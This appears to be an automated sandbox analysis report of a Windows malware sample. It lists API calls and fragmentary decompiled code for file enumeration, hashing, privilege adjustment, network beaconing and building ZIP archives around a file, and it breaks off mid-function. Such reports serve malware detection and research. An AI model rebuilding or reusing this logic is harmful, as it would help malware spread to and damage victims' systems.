GetSystemDirectoryA.KERNEL32(?,?), ref: 004013E2
lstrlen.KERNEL32(?,?,?,?,0040144A,?,000000C8,?,?,fzaff.rkr), ref: 004013E8
lstrcat.KERNEL32(?,00403036), ref: 004013FA
lstrcat.KERNEL32(?,000000C8), ref: 00401403

Memory Dump Source

Source File: 00000004.00000002.273253407.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.273184644.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273381026.0000000000403000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273389736.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273402573.0000000000407000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ctfmen.jbxd

Similarity

API ID: lstrcat$DirectorySystemlstrlen
String ID:
API String ID: 3692445580-0
Opcode ID: f6e07c299ec493689eb8d796aa5aaf7f4d2c1ab6089d07d3808badf12fab5d33
Instruction ID: ee4f3b154ff9c557860304a6dc4c68e4ea2146a5b4c228ad87cd1209cd76fe63
Opcode Fuzzy Hash: f6e07c299ec493689eb8d796aa5aaf7f4d2c1ab6089d07d3808badf12fab5d33
Instruction Fuzzy Hash: E7E092716013087BCB10EEA6CC81D9E7B5D9F58369B00442ABA09621A3CA3E85504B24

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: smnss.exePID: 1460, Parent PID: 2740COMMON

Execution Graph

Execution Coverage:	15.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1401
Total number of Limit Nodes:	18

Executed Functions

Function 00403790 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 133
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_mbscpy.MSVCRT ref: 004037D8
memset.MSVCRT ref: 0040383B
FindFirstFileA.KERNEL32 ref: 0040385C
FindNextFileA.KERNEL32 ref: 00403888
lstrcpy.KERNEL32 ref: 004038CC
_mbscat.MSVCRT ref: 00403910
FindClose.KERNEL32 ref: 00403957

Strings

C:\, xrefs: 00403794
*.*, xrefs: 0040381A
., xrefs: 00403898
., xrefs: 004038AA
\, xrefs: 004038E4

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: Find$File$CloseFirstNext_mbscat_mbscpylstrcpymemset
String ID: *.*$.$.$C:\$\
API String ID: 1316374366-389428931
Opcode ID: 6bb881a1093a1ff426846c50c2e3e695106a01521adaf6e845e5a118fa89989f
Instruction ID: b4465dfa5f332ec533157c87ff7dca4d317d8e0d8912ef682c4f4d402bf95f8b
Opcode Fuzzy Hash: 6bb881a1093a1ff426846c50c2e3e695106a01521adaf6e845e5a118fa89989f
Instruction Fuzzy Hash: 505194758083588ADB20AF35C48839DBFE5AF44315F1486BEE859673C1DB788F88CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0040447C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 105
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 26%

			E0040447C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v12;
				void _v28;
				long* _v32;
				void* _v36;
				char _v40;
				char _v44;
				int _v60;
				int _v64;
				int _v68;
				int _v72;
				char* _v76;
				int _v80;
				int _v84;
				intOrPtr _v88;
				int _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				int _v112;
				char* _v116;
				char* _v120;
				intOrPtr _v124;
				int _v128;
				int _v132;
				char* _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v168;
				intOrPtr _v172;
				int _t54;
				long* _t57;
				int _t60;
				intOrPtr _t76;
				int _t79;
				signed int _t82;
				void* _t83;
				intOrPtr* _t86;
				void* _t88;
				void* _t89;
				intOrPtr* _t90;
				intOrPtr* _t93;

				_t76 = _a12;
				asm("cld");
				memset( &_v28, 0, 4 << 2);
				_v60 = 0;
				_v64 = 1;
				_v68 = 0;
				_v72 = 0;
				_t54 = CryptAcquireContextA( &_v32); // executed
				_t86 = _t83 - 0x40 + 0xc - 0x14;
				_t79 = 0;
				if(_t54 != 0) {
					_v76 =  &_v36;
					_v80 = 0;
					_v84 = 0;
					_v88 = 0x8003;
					_t57 = _v32;
					 *_t86 = _t57;
					L0040C4B0();
					_t88 = _t86 - 0x14;
					_t79 = 0;
					if(_t57 != 0) {
						_v100 = 0;
						_v104 = _a8;
						_v108 = _a4;
						_t60 = _v36;
						_v112 = _t60;
						L0040C4B8();
						_t89 = _t88 - 0x10;
						if(_t60 != 0) {
							_v40 = 4;
							_v112 = 0;
							_v116 =  &_v40;
							_v120 =  &_v44;
							_v124 = 4;
							_v128 = _v36;
							L0040C4D0();
							_t90 = _t89 - 0x14;
							_v132 = 0;
							_v136 =  &_v44;
							_v140 =  &_v28;
							_v144 = 2;
							 *_t90 = _v36;
							L0040C4D0();
							_v168 = _v36;
							L0040C4C0();
							_v168 = 0;
							CryptReleaseContext(_v32);
							_t93 = _t90 - 8;
							_t82 = 0;
							if(0 < _v44) {
								do {
									_v168 =  *( &_v28 + _t82) & 0x000000ff;
									_v172 = "%2.2x";
									 *_t93 = _t76 + _t82 * 2;
									sprintf(??, ??);
									_t82 = _t82 + 1;
								} while (_t82 < _v44);
							}
							_t79 = 1;
						} else {
							_v128 = _v36;
							L0040C4C0();
							_v128 = 0;
							CryptReleaseContext(_v32);
							_t79 = 0;
						}
					}
				}
				return _t79;
			}

APIs

CryptAcquireContextA.ADVAPI32 ref: 004044BD
CryptCreateHash.ADVAPI32 ref: 004044F7
CryptHashData.ADVAPI32 ref: 00404528
CryptDestroyHash.ADVAPI32 ref: 0040453A
CryptReleaseContext.ADVAPI32 ref: 00404550
CryptGetHashParam.ADVAPI32 ref: 0040458D
CryptGetHashParam.ADVAPI32 ref: 004045B9
CryptDestroyHash.ADVAPI32 ref: 004045C7
CryptReleaseContext.ADVAPI32 ref: 004045DD
sprintf.MSVCRT ref: 00404606

Strings

%2.2x, xrefs: 004045F8

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: Crypt$Hash$Context$DestroyParamRelease$AcquireCreateDatasprintf
String ID: %2.2x
API String ID: 3563044075-341615062
Opcode ID: c977df23211e434dc7ae6194df0722f08c56245aff09abc11c4fb2b5cff81619
Instruction ID: 71e90cb579b3012189f1bc8fcce2ad08a11f5a443b18af0431ecfa41047fce4e
Opcode Fuzzy Hash: c977df23211e434dc7ae6194df0722f08c56245aff09abc11c4fb2b5cff81619
Instruction Fuzzy Hash: 6A41A6B5904309DBDB00EF69C58579EBBF4BB84314F00892EE984A7381E779D548CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 00401149 Relevance: 13.6, APIs: 9, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00401149() {
				char _v12;
				char _v16;
				char* _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr _t20;
				char _t23;
				intOrPtr* _t25;
				_Unknown_base(*)()* _t34;
				void* _t36;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				void* _t42;
				signed int _t44;

				_v44 = E00401000; // executed
				SetUnhandledExceptionFilter(_t34); // executed
				_t44 = _t42 - 0x20;
				E0040B000(E0040AF00(_t36, _t37));
				_v12 = 0;
				_v32 =  &_v12;
				_t20 =  *0x40d4e4; // 0xffffffff
				 *_t44 = 0x414004;
				_v36 = _t20;
				_v40 =  &_v16;
				_v44 = 0x414000;
				L0040C1B0();
				_t23 =  *0x418230;
				if(_t23 == 0) {
					L7:
					L0040C1A0();
					_t38 =  *0x40d4e8; // 0x4000
					 *_t23 = _t38;
					E0040AED0(_t23);
					_t44 = _t44 & 0xfffffff0;
					_t25 = E0040AEB0();
					L0040C190();
					_v40 =  *_t25;
					_v44 =  *0x414000;
					 *_t44 =  *0x414004; // executed
					_t23 = E00404076(_t38); // executed
					L0040C188();
					 *_t44 = _t23;
					ExitProcess(??);
					goto L8;
				} else {
					 *0x40d4e8 = _t23;
					_t39 =  *0x4194a4;
					if(_t39 != 0) {
						L8:
						_v40 = _t23;
						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x10));
						_v44 = _t23;
						L0040C1A8();
						_t39 =  *0x4194a4;
					}
					if(_t39 != 0xffffffe0) {
						_v40 =  *0x418230;
						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x30));
						_v44 = _t23;
						L0040C1A8();
						_t39 =  *0x4194a4;
					}
					if(_t39 != 0xffffffc0) {
						_v40 =  *0x418230;
						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x50));
						_v44 = _t23;
						L0040C1A8();
					}
					goto L7;
				}
			}

0x00401157
0x0040115e
0x00401163
0x0040116b
0x00401170
0x0040117a
0x0040117e
0x00401183
0x0040118a
0x00401191
0x0040119a
0x0040119e
0x004011a3
0x004011aa
0x00401210
0x00401210
0x00401215
0x0040121b
0x0040121d
0x00401222
0x00401225
0x0040122a
0x00401231
0x0040123a
0x00401243
0x00401246
0x0040124d
0x00401252
0x00401255
0x00000000
0x004011ac
0x004011ac
0x004011b1
0x004011b9
0x00401260
0x00401260
0x00401269
0x0040126c
0x0040126f
0x00401274
0x00401274
0x004011c2
0x004011c9
0x004011d2
0x004011d5
0x004011d8
0x004011dd
0x004011dd
0x004011e6
0x004011ed
0x004011f6
0x004011f9
0x004011fc
0x004011fc
0x00000000
0x004011e6

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040115E
__getmainargs.MSVCRT ref: 0040119E
_setmode.MSVCRT ref: 004011D8
_setmode.MSVCRT ref: 004011FC
__p__fmode.MSVCRT ref: 00401210
__p__environ.MSVCRT ref: 0040122A
_cexit.MSVCRT ref: 0040124D
ExitProcess.KERNEL32 ref: 00401255
_setmode.MSVCRT ref: 0040126F

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
String ID:
API String ID: 3695137517-0
Opcode ID: 17c38317f9a66652df7258aecbb9e80ccef0f3f3888fbe713f9de6f1fcdca26b
Instruction ID: fdd625d713225136926791f8e063cfc049a139930cefd6fb9cd0f0f3deb6f4ef
Opcode Fuzzy Hash: 17c38317f9a66652df7258aecbb9e80ccef0f3f3888fbe713f9de6f1fcdca26b
Instruction Fuzzy Hash: 8F310DB4908701DFC700EF75D98164E77E5BF88354F008A7EE545AB3A2D738A8418F5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401150 Relevance: 13.6, APIs: 9, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00401150() {
				char _v12;
				char _v16;
				char* _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr _t20;
				char _t23;
				intOrPtr* _t25;
				void* _t35;
				void* _t36;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t39;
				signed int _t40;

				_v44 = E00401000; // executed
				SetUnhandledExceptionFilter(??); // executed
				_t40 = _t39 - 4;
				E0040B000(E0040AF00(_t35, _t36));
				_v12 = 0;
				_v32 =  &_v12;
				_t20 =  *0x40d4e4; // 0xffffffff
				 *_t40 = 0x414004;
				_v36 = _t20;
				_v40 =  &_v16;
				_v44 = 0x414000;
				L0040C1B0();
				_t23 =  *0x418230;
				if(_t23 == 0) {
					L6:
					L0040C1A0();
					_t37 =  *0x40d4e8; // 0x4000
					 *_t23 = _t37;
					E0040AED0(_t23);
					_t40 = _t40 & 0xfffffff0;
					_t25 = E0040AEB0();
					L0040C190();
					_v40 =  *_t25;
					_v44 =  *0x414000;
					 *_t40 =  *0x414004; // executed
					_t23 = E00404076(_t37); // executed
					L0040C188();
					 *_t40 = _t23;
					ExitProcess(??);
					L7:
					_v40 = _t23;
					_t23 =  *((intOrPtr*)( *0x4194a4 + 0x10));
					_v44 = _t23;
					L0040C1A8();
					_t38 =  *0x4194a4;
					L2:
					if(_t38 != 0xffffffe0) {
						_v40 =  *0x418230;
						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x30));
						_v44 = _t23;
						L0040C1A8();
						_t38 =  *0x4194a4;
					}
					if(_t38 != 0xffffffc0) {
						_v40 =  *0x418230;
						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x50));
						_v44 = _t23;
						L0040C1A8();
					}
					goto L6;
				}
				 *0x40d4e8 = _t23;
				_t38 =  *0x4194a4;
				if(_t38 != 0) {
					goto L7;
				}
				goto L2;
			}

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040115E
__getmainargs.MSVCRT ref: 0040119E
_setmode.MSVCRT ref: 004011D8
_setmode.MSVCRT ref: 004011FC
__p__fmode.MSVCRT ref: 00401210
__p__environ.MSVCRT ref: 0040122A
_cexit.MSVCRT ref: 0040124D
ExitProcess.KERNEL32 ref: 00401255
_setmode.MSVCRT ref: 0040126F

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
String ID:
API String ID: 3695137517-0
Opcode ID: 5dea925255efc0a92b5cd23e23833b04243e3d0205a30240cc68abcc00f57cf9
Instruction ID: fe54e7aefeed6918a5ef1b916f0e819b51a912cea38922c35654569b06e5a2dd
Opcode Fuzzy Hash: 5dea925255efc0a92b5cd23e23833b04243e3d0205a30240cc68abcc00f57cf9
Instruction Fuzzy Hash: 8631EDB4908701DFC700EF75D98154E77E5BF88354F008A7EE545AB3A2D73898418B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00404DFA
OpenProcessToken.ADVAPI32 ref: 00404E11
LookupPrivilegeValueA.ADVAPI32 ref: 00404E36
AdjustTokenPrivileges.ADVAPI32 ref: 00404E89
CloseHandle.KERNEL32 ref: 00404E9E

Strings

(, xrefs: 00404E06

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID: (
API String ID: 3038321057-3887548279
Opcode ID: 70bff709f9072d4e6a1122d309d6733e6ebeebff8d79adb6f2d5725a62973f5d
Instruction ID: 79319732bb30defa6c9a9f1a6b789a97df9146ac2c859e5e9c71adcb6af8603d
Opcode Fuzzy Hash: 70bff709f9072d4e6a1122d309d6733e6ebeebff8d79adb6f2d5725a62973f5d
Instruction Fuzzy Hash: 21119BB4904305DBDB00EF69C18579EBBF4BF44348F00892EE884A7385E779D549CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00401C2C Relevance: 49.3, APIs: 20, Strings: 8, Instructions: 294
stringnetworksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00401C63
memset.MSVCRT ref: 00401C81
_mbscat.MSVCRT ref: 00401C90
_mbscat.MSVCRT ref: 00401CCD

Part of subcall function 00405316: gethostname.WS2_32 ref: 0040532B
Part of subcall function 00405316: gethostbyname.WS2_32 ref: 00405336
Part of subcall function 00405316: inet_ntoa.WS2_32 ref: 00405351

_mbscat.MSVCRT ref: 00401D1B

Part of subcall function 00405256: GetVersionExA.KERNEL32 ref: 00405272

_mbscat.MSVCRT ref: 00401D49
_mbscat.MSVCRT ref: 00401D7D
Sleep.KERNEL32 ref: 00401E82
_mbscat.MSVCRT ref: 00401DD7

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

send.WS2_32 ref: 00401EF2
recv.WS2_32 ref: 00401F2A
strtok.MSVCRT ref: 00401F89
strtok.MSVCRT ref: 00401FA8
closesocket.WS2_32 ref: 00401FBD
atoi.MSVCRT ref: 00401FD4
atoi.MSVCRT ref: 00401FEA
memset.MSVCRT ref: 00402043
lstrlen.KERNEL32 ref: 00402051

Part of subcall function 0040447C: CryptAcquireContextA.ADVAPI32 ref: 004044BD
Part of subcall function 0040447C: CryptCreateHash.ADVAPI32 ref: 004044F7
Part of subcall function 0040447C: CryptHashData.ADVAPI32 ref: 00404528
Part of subcall function 0040447C: CryptDestroyHash.ADVAPI32 ref: 0040453A
Part of subcall function 0040447C: CryptReleaseContext.ADVAPI32 ref: 00404550

lstrcmp.KERNEL32 ref: 004020AB
lstrcmp.KERNEL32 ref: 004020CD

Strings

ost:, xrefs: 00401DB8
nt: , xrefs: 00401E25
wer, xrefs: 00401E4F
3159, xrefs: 00401CE8
P, xrefs: 00401E93
=-A, xrefs: 00401DCD, 00401E9B
expl, xrefs: 00401E44
-Age, xrefs: 00401E1A

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: _mbscat$Crypt$Hashmemset$Contextatoilstrcmpstrtok$AcquireConnectedCreateDataDestroyHandleInternetLibraryLoadModuleReleaseSleepStateVersionclosesocketgethostbynamegethostnameinet_ntoalstrlenrecvsend
String ID: -Age$3159$=-A$P$expl$nt: $ost:$wer
API String ID: 1488133686-2239103369
Opcode ID: de7e634d1739514db72c789e03cdfd8988fa8f181946e4b526a8adfd228abd02
Instruction ID: 99ea3051cc31653010b65aed47ab6d4c6dbc815114f0d374468db723e332898a
Opcode Fuzzy Hash: de7e634d1739514db72c789e03cdfd8988fa8f181946e4b526a8adfd228abd02
Instruction Fuzzy Hash: 79C186B48043148BD724AF29C58535A7BF1EF85318F2086AEE45C5B7D2CB798D86CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0040829C Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 231
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0040829C(signed int __edx, CHAR* _a4, CHAR* _a8, void* _a12) {
				void* _v16;
				short _v32;
				short _v34;
				long _v38;
				long _v42;
				intOrPtr _v46;
				void* _v48;
				signed short _v50;
				short _v52;
				short _v54;
				short _v56;
				void _v60;
				short _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				short _v82;
				short _v84;
				short _v86;
				short _v88;
				char _v92;
				struct _OVERLAPPED* _v98;
				intOrPtr _v102;
				short _v104;
				short _v110;
				short _v112;
				long _v116;
				long _v120;
				intOrPtr _v124;
				short _v126;
				short _v128;
				short _v130;
				short _v132;
				short _v134;
				short _v136;
				void _v140;
				char _v1164;
				long _v1168;
				long _v1172;
				void* _v1176;
				void* _v1188;
				void* _v1192;
				void* _v1196;
				void* _v1200;
				void* _v1204;
				void* _v1208;
				char _v1212;
				struct _OVERLAPPED* _v1216;
				void* _v1220;
				long _v1224;
				void* _v1228;
				signed int _t133;
				signed int _t137;
				int _t140;
				int _t141;
				intOrPtr _t148;
				long _t149;
				long _t150;
				short _t151;
				long _t155;
				char _t159;
				int _t162;
				long _t167;
				void* _t171;
				intOrPtr _t187;
				struct _OVERLAPPED* _t190;
				signed int _t197;
				signed int _t199;
				void* _t204;
				void* _t206;
				void* _t208;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t225;
				void* _t226;
				intOrPtr* _t230;
				void** _t231;

				_t197 = __edx;
				_t133 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
				_t213 = _t212 - 0x1c;
				_t211 = _t133;
				_t190 = 0;
				_t199 = _t197 & 0xffffff00 | _t133 == 0xffffffff | _t133 & 0xffffff00 | _t133 == 0x00000000;
				if(_t199 == 0) {
					_t137 = CreateFileA(_a8, 0x40000000, 3, 0, 2, 0x80, 0); // executed
					_t214 = _t213 - 0x1c;
					_v1176 = _t137;
					if((_t199 & 0xffffff00 | _t137 == 0xffffffff | _t137 & 0xffffff00 | _t137 == 0x00000000) == 0) {
						_t204 =  &_v60;
						asm("cld");
						_t140 = memset(_t204, 0, 7 << 2);
						 *((short*)(_t204 + 7)) = 0;
						_t206 =  &_v140;
						_t141 = memset(_t206, _t140, 0xb << 2);
						 *((short*)(_t206 + 0xb)) = 0;
						_t208 =  &_v92;
						memset(_t208, _t141, 5 << 2);
						 *((short*)(_t208 + 5)) = 0;
						_v60 = 0x4034b50;
						_v56 = 0xa;
						_v134 = 0xa;
						_v54 = 0;
						_v132 = 0;
						_v52 = 0;
						_v130 = 0;
						E0040814C( &_v50,  &_v48);
						_v128 = _v50 & 0x0000ffff;
						_v126 = _v48;
						_t148 = E004081D8(_t211); // executed
						_v46 = _t148;
						_v124 = _t148;
						_t149 = GetFileSize(_t211, 0);
						_v42 = _t149;
						_v120 = _t149;
						_t150 = GetFileSize(_t211, 0);
						_v38 = _t150;
						_v116 = _t150;
						_t151 = _a12;
						_v1212 = _t151;
						L0040C310();
						_v34 = _t151;
						_v112 = _t151;
						_v32 = 0;
						_v110 = 0;
						_v98 = 0;
						WriteFile(_v1176,  &_v60, 0x1e,  &_v1168, 0); // executed
						_t155 = _a12;
						_v1216 = _t155;
						L0040C310();
						WriteFile(_v1176, _a12, _t155,  &_v1168, 0); // executed
						_t159 = _a12;
						_v1220 = _t159;
						L0040C310();
						_t74 = _t159 + 0x1e; // 0x1e
						_t187 = _t74;
						SetFilePointer(_t211, 0, 0, 0); // executed
						_t225 = _t214 + 0x24 - 0xffffffffffffffbc;
						_t210 =  &_v1164;
						while(1) {
							_v1168 = 0;
							_t162 = ReadFile(_t211, _t210, 0x400,  &_v1168, 0); // executed
							_t226 = _t225 - 0x14;
							if(_t162 == 0 || _v1168 == 0) {
								break;
							}
							WriteFile(_v1176, _t210, _v1168,  &_v1172, 0); // executed
							_t225 = _t226 - 0x14;
							_t187 = _t187 + _v1168;
						}
						_v76 = _t187;
						_v140 = 0x2014b50;
						_v136 = 0x14;
						_v104 = 0;
						_v102 = 0x20;
						WriteFile(_v1176,  &_v140, 0x2e,  &_v1168, 0); // executed
						_t167 = _a12;
						_v1224 = _t167;
						L0040C310();
						WriteFile(_v1176, _a12, _t167,  &_v1168, 0); // executed
						_t171 = _a12;
						_v1228 = _t171;
						L0040C310();
						_t230 = _t226 - 0xfffffffffffffff8;
						_v92 = 0x6054b50;
						_v88 = 0;
						_v86 = 0;
						_v84 = 1;
						_v82 = 1;
						_v80 = _t187 + 0x2e + _t171 - _v76;
						_v72 = 0;
						_v1216 = 0;
						_v1220 =  &_v1168;
						_v1224 = 0x16;
						_v1228 =  &_v92;
						 *_t230 = _v1176; // executed
						WriteFile(??, ??, ??, ??, ??); // executed
						_t231 = _t230 - 0x14;
						 *_t231 = _v1176; // executed
						CloseHandle(??); // executed
						 *(_t231 - 4) = _t211;
						CloseHandle(??);
						_t190 = 1;
					} else {
						CloseHandle(_t211);
						_t190 = 0;
					}
				}
				return _t190;
			}

APIs

CreateFileA.KERNEL32 ref: 004082DE
CreateFileA.KERNEL32 ref: 00408336
CloseHandle.KERNEL32 ref: 00408356
GetFileSize.KERNEL32 ref: 00408409
GetFileSize.KERNEL32 ref: 00408422
lstrlen.KERNEL32 ref: 00408436
WriteFile.KERNEL32 ref: 00408480
lstrlen.KERNEL32 ref: 0040848E
WriteFile.KERNEL32 ref: 004084BC
lstrlen.KERNEL32 ref: 004084CA
SetFilePointer.KERNEL32 ref: 004084F0
ReadFile.KERNEL32 ref: 00408529

Strings

., xrefs: 004085AC
, xrefs: 00408593

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: File$lstrlen$CreateSizeWrite$CloseHandlePointerRead
String ID: $.
API String ID: 2059494333-3929174939
Opcode ID: db96ad772c5433479edb6ec15f6712a25d66f452af447f7d950adf714c5fff61
Instruction ID: 330a0651d7a757380811ed2d4a39bd4f834bab233f08717d63250c6a01a72e4e
Opcode Fuzzy Hash: db96ad772c5433479edb6ec15f6712a25d66f452af447f7d950adf714c5fff61
Instruction Fuzzy Hash: 17B1DDB4804304DBDB10EF65C59579EBBF4BF44304F00896EE898A7391E7799648CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00404076 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 169
sleeplibrarythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 22%

			E00404076(void* __edx) {
				void* _v16;
				char _v428;
				char _v588;
				char _v748;
				char _v908;
				char _v940;
				char _v944;
				char* _v976;
				int _v980;
				int _v984;
				char* _v988;
				int _v992;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t43;
				void* _t44;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t55;
				char _t58;
				void* _t60;
				intOrPtr _t63;
				char* _t90;
				char* _t91;
				char* _t92;
				char* _t93;
				void* _t96;
				void* _t98;
				char* _t100;
				void* _t101;
				char* _t102;
				void* _t103;
				int* _t106;
				char** _t107;
				char** _t109;
				char** _t112;
				char** _t113;

				_t96 = __edx;
				E0040B320();
				E0040AEB0();
				_v984 =  &_v428;
				_v988 = 2; // executed
				L004086C8(); // executed
